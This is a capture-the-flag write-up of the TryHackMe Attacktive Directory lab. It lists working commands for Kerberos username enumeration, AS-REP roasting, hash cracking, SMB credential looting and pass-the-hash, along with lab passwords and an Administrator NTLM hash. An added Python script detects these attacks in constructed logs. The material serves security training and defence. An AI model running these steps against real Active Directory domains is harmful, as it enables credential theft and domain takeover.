Attacktive Directory Room WriteUp
This is my write-up for the Attacktive Directory room on TryHackMe.
I will not go deep into why the answer is "x" or "y"; that part is your job, understanding what the room is trying to teach you.
This room is also a CTF-style room, so I will try to go deep into the technical details of the technique(s) we use.
Task 1 - Intro Deploy The Machine
- Getting started
Task 2 - Intro Setup
- Download impacket
Task 3 - Enumeration Welcome to Attacktive Directory
What tool will allow us to enumerate port 139/445?
enum4linux
What is the NetBIOS-Domain Name of the machine?
THM-AD
Enum4linux
enum4linux $IP
...
===========================================
| Getting domain SID for 10.10.17.164 |
===========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: THM-AD
Domain Sid: S-1-5-21-3591857110-2884097990-301047963
[+] Host is part of a domain (not a workgroup)
...
What invalid TLD do people commonly use for their Active Directory Domain?
.local
Task 4 - Enumeration Enumerating Users via Kerberos
To do this task you will first need to download kerbrute.
What command within Kerbrute will allow us to enumerate valid usernames?
userenum
./kerbrute --help
What notable account is discovered? (These should jump out at you)
svc-admin
Nmap Scan
nmap -sC -sV -T4 10.10.17.164
...
| Target_Name: THM-AD
| NetBIOS_Domain_Name: THM-AD
| NetBIOS_Computer_Name: ATTACKTIVEDIREC
| DNS_Domain_Name: spookysec.local
| DNS_Computer_Name: AttacktiveDirectory.spookysec.local
...
Download the modified User Lists
Kerbrute userenum
./kerbrute userenum --dc spookysec.local -d spookysec.local userlist.txt
What is the other notable account that is discovered? (These should jump out at you)
backup
Task 5 - Exploitation Abusing Kerberos
We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?
svc-admin
Using impacket-GetNPUsers
impacket-GetNPUsers spookysec.local/svc-admin
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
Password:
- Put the hash we found in a file called hash.txt for later usage
Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)
Kerberos 5 AS-REP etype 23
- Go to the Hashcat Examples Wiki page to find the example hash that matches the hash we found
What mode is the hash?
18200
Now crack the hash with the modified password list provided; what is the user account's password?
management2005
Download the modified Password Lists
Cracking the password with hashcat
hashcat -m 18200 hash.txt passwordlist.txt --force
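Added example (not part of the original write-up): how a defender sees the two Kerberos steps above, the kerbrute username enumeration from Task 4 and the AS-REP we pulled for svc-admin in Task 5, in the domain controller's Windows Security event 4768 (TGT requested). Guesses for names that do not exist fail with result code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN), and an AS-REP issued with Pre-Authentication Type 0 is exactly where the etype 23 hash comes from, which only happens for accounts with "Do not require Kerberos preauthentication" set. The event lines, the source IP and the user names other than svc-admin and backup are constructed, in a simplified key=value form rather than a real event export.

```python
import re
from collections import Counter, defaultdict

# Constructed sample events in a simplified key=value form (not real exports);
# field names mirror Windows Security event 4768 (TGT requested). Failed
# requests carry Status=0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN): the name does not exist.
SAMPLE_EVENTS = [
    "EventID=4768 TargetUserName=nosuchuser1 IpAddress=10.10.17.200 Status=0x6",
    "EventID=4768 TargetUserName=nosuchuser2 IpAddress=10.10.17.200 Status=0x6",
    "EventID=4768 TargetUserName=nosuchuser3 IpAddress=10.10.17.200 Status=0x6",
    "EventID=4768 TargetUserName=svc-admin IpAddress=10.10.17.200 PreAuthType=0 TicketEncryptionType=0x17 Status=0x0",
    "EventID=4768 TargetUserName=backup IpAddress=10.10.17.200 PreAuthType=0 TicketEncryptionType=0x17 Status=0x0",
    "EventID=4768 TargetUserName=alice IpAddress=10.10.17.50 PreAuthType=2 TicketEncryptionType=0x12 Status=0x0",
    "EventID=4769 TargetUserName=alice IpAddress=10.10.17.50 TicketEncryptionType=0x12 Status=0x0",
]

FIELD_RE = re.compile(r"(\w+)=(\S+)")
ENUM_THRESHOLD = 3  # unknown-principal failures from one source before alerting

def parse_event(line):
    """Turn one key=value event line into a dict."""
    return dict(FIELD_RE.findall(line))

def analyse(lines):
    """Return (roasted, enumerators).
    roasted: {source_ip: [accounts whose AS-REP was issued with
             PreAuthType=0]}. Such a reply is crackable offline (hashcat 18200
             for etype 0x17/23), so these accounts should lose the
             DONT_REQ_PREAUTH flag (userAccountControl bit 0x400000).
    enumerators: {source_ip: count of 0x6 failures} for sources at or above
             ENUM_THRESHOLD, the footprint of username guessing.
    """
    roasted = defaultdict(list)
    unknown = Counter()
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4768":
            continue  # 4769 service-ticket events are not TGT requests
        if ev.get("Status") == "0x6":
            unknown[ev.get("IpAddress", "?")] += 1
        elif ev.get("Status") == "0x0" and ev.get("PreAuthType") == "0":
            roasted[ev.get("IpAddress", "?")].append(ev["TargetUserName"])
    enumerators = {ip: n for ip, n in unknown.items() if n >= ENUM_THRESHOLD}
    return dict(roasted), enumerators

if __name__ == "__main__":
    roasted, enumerators = analyse(SAMPLE_EVENTS)
    print("AS-REP issued without pre-auth:", roasted)
    print("possible username enumeration:", enumerators)
```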
Task 6 - Enumeration Back to the Basics
What utility can we use to map remote SMB shares?
smbclient
Which option will list shares?
-L
How many remote shares is the server listing?
6
SMB enum with the credentials svc-admin:management2005
smbclient -L=$IP -U svc-admin
Enter WORKGROUP\svc-admin's password:
Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
backup          Disk
C$              Disk      Default share
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share
SYSVOL          Disk      Logon server share
There is one particular share that we have access to that contains a text file. Which share is it?
backup
What is the content of the file?
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
Decoding the contents of the file, what is the full contents?
backup@spookysec.local:backup2517860
Base64 decode
echo YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw | base64 -d
Task 7 - Domain Privilege Escalation Elevating Privileges within the Domain
What method allowed us to dump NTDS.DIT?
DRSUAPI
What is the Administrator's NTLM hash?
0e0363213e37b94221497260b0bcb4fc
What method of attack could allow us to authenticate as the user without the password?
Pass The Hash
Using a tool called Evil-WinRM, what option will allow us to use a hash?
-H
Using evil-winrm
evil-winrm -i 10.10.17.164 -u administrator -H 0e0363213e37b94221497260b0bcb4fc
Task 8 - Flag Submission Flag Submission Panel
svc-admin
TryHackMe{REDACTED}
backup
TryHackMe{REDACTED}
administrator
TryHackMe{REDACTED}